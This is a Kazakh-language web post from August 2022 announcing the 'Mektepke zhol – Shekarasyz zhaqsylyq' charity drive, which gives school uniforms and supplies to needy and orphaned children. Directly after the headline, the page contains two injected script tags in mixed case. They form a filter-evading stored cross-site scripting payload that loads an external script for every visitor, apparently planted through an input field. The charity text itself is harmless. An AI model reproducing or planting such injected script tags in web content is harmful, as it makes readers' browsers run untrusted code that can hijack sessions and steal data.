"Мектепке жол - Шекарасыз жақсылық" акциясына қатысыңыз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.08.2022

🔰Тамыздың бірінен басталатын дәстүрлі  "Мектепке жол" акциясы
биыл "Мектепке жол - Шекарасыз жақсылық" ұранымен жаңа оқу жылы қарсаңында ұйымдастырылғалы отыр. 
 ✅Акцияның мақсаты - оқумен қамтылмаған балаларды анықтау, аз қамтылған және көп балалы отбасы, жетім және ата-анасының қамқорлығынсыз қалған балаларға жаңа оқу жылына дайындық кезеңіне қолдау көрсету.
♻️Қайырымдылық акциясы барысында мұқтаж балаларға қажет мектеп формасы, спорттық киімдер мен мектепке қажетті оқу құралдары табыс етіледі.
 ✨Осыған орай жаны жайсаң, қолы ашық, жомарт жандардың барлығын өскелең ұрпақтың сапалы білім алуына жағдай жасап, олардың болашағына үкілі үміт сыйлау мақсатында
 "Мектепке жол - Шекарасыз жақсылық" Республикалық акциясына
 1️⃣тамыз - 3️⃣0️⃣қыркүйек аралығында белсенді қатысуға шақырамыз!

#МЕКТЕПКЕЖОЛ2022
#ШЕКАРАСЫЗЖАҚСЫЛЫҚ

Просмотров: 642


Пікір қосу



Деректерді қолтаңбаға қосу